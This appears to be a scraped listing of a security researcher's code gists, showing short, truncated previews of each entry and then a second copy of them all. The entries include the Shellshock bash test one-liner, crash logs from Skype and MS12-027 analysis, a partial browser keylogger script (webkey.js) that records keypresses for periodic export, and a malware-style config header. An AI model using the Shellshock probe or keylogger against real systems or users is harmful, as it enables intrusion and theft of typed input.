Abhisek Datta abhisek

## gist:30933636ca7fa3e6bc92
env x='() { :;}; echo Vulnerable' bash -c "echo Hello"

## hello.cgi
#!/bin/bash

printf "Content-type: text/html\n\n";
printf "Hello, World.";

## server.c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/time.h>
#include <netinet/in.h>
#include <unistd.h>
#include <signal.h>
#include <assert.h>

## xor.rb
def xor(str, key)
   str.split(//).collect {|e| [e.unpack('C').first ^ (key.to_i & 0xFF)].pack('C') }.join
end

## slow_server.rb
require 'eventmachine'
require 'socket'

$port = 9595
$connections = []
$timer_i = 3

class SlowServerConnection < EventMachine::Connection

  def initialize(*args)

## PE_Section_Enum.cpp
#define WIN32_LEAN_AND_MEAN
#include <windows.h>
#include <winnt.h>
#include <intrin.h>

typedef struct _UNICODE_STR
{
  USHORT Length;
  USHORT MaximumLength;
  PWSTR pBuffer;

## Skype Greeting API Crash Log
0:011> u @eip
<Unloaded_i.dll>+0x1e:
0000001f ??              ???
            ^ Memory access error in 'u @eip'
0:011> dd @esp
03e2fde0  0095cadd 010dd544 00000000 001e3206
03e2fdf0  05566a80 001f3e98 001f0ba0 000003a7
03e2fe00  05566a95 0063028b 05566a80 00000000
03e2fe10  001523aa 0542dbd8 03e2fe78 0015238d
03e2fe20  00000000 0557ec70 001e3206 0512c888

## MS12-027 Crash Analysis
Crash Stack Trace:

0:000> kb
ChildEBP RetAddr  Args to Child
WARNING: Stack unwind information not available. Following frames may be wrong.
0012eaa0 275c8a0a 0012eacc 00208008 00008282 MSCOMCTL!DllGetClassObject+0x41a87
0012ead4 27583c30 00000000 01000000 c279eb90 MSCOMCTL!DllGetClassObject+0x41cc6
00000000 00000000 00000000 00000000 00000000 MSCOMCTL!DllCanUnloadNow+0xc7d


## webkey.js
var WEBKEY = {
  dataLog: "",
  start: function() {
            window.onkeypress = function(ev) {
              WEBKEY.dataLog += String.fromCharCode(ev.charCode);
            }

            setInterval("WEBKEY.exportLog();", 5000);
         },
  exportLog: function() {

## Config.h
#ifndef _CONFIG_H
#define _CONFIG_H

#define CFG_SRV_PORT	8389
#define CFG_MUTEX		TEXT("BatMan")
#define CFG_SRV_FLAG	TEXT("-booyah")

#endif
	#!/bin/bash

	printf "Content-type: text/html\n\n";
	printf "Hello, World.";
	#include <stdio.h>
	#include <stdlib.h>
	#include <string.h>
	#include <sys/types.h>
	#include <sys/socket.h>
	#include <sys/time.h>
	#include <netinet/in.h>
	#include <unistd.h>
	#include <signal.h>
	#include <assert.h>
	def xor(str, key)
	str.split(//).collect {\|e\| [e.unpack('C').first ^ (key.to_i & 0xFF)].pack('C') }.join
	end
	require 'eventmachine'
	require 'socket'

	$port = 9595
	$connections = []
	$timer_i = 3

	class SlowServerConnection < EventMachine::Connection

	def initialize(*args)
	#define WIN32_LEAN_AND_MEAN
	#include <windows.h>
	#include <winnt.h>
	#include <intrin.h>

	typedef struct _UNICODE_STR
	{
	USHORT Length;
	USHORT MaximumLength;
	PWSTR pBuffer;
	0:011> u @eip
	<Unloaded_i.dll>+0x1e:
	0000001f ?? ???
	^ Memory access error in 'u @eip'
	0:011> dd @esp
	03e2fde0 0095cadd 010dd544 00000000 001e3206
	03e2fdf0 05566a80 001f3e98 001f0ba0 000003a7
	03e2fe00 05566a95 0063028b 05566a80 00000000
	03e2fe10 001523aa 0542dbd8 03e2fe78 0015238d
	03e2fe20 00000000 0557ec70 001e3206 0512c888
	Crash Stack Trace:

	0:000> kb
	ChildEBP RetAddr Args to Child
	WARNING: Stack unwind information not available. Following frames may be wrong.
	0012eaa0 275c8a0a 0012eacc 00208008 00008282 MSCOMCTL!DllGetClassObject+0x41a87
	0012ead4 27583c30 00000000 01000000 c279eb90 MSCOMCTL!DllGetClassObject+0x41cc6
	00000000 00000000 00000000 00000000 00000000 MSCOMCTL!DllCanUnloadNow+0xc7d
	var WEBKEY = {
	dataLog: "",
	start: function() {
	window.onkeypress = function(ev) {
	WEBKEY.dataLog += String.fromCharCode(ev.charCode);
	}

	setInterval("WEBKEY.exportLog();", 5000);
	},
	exportLog: function() {
	#ifndef _CONFIG_H
	#define _CONFIG_H

	#define CFG_SRV_PORT 8389
	#define CFG_MUTEX TEXT("BatMan")
	#define CFG_SRV_FLAG TEXT("-booyah")

	#endif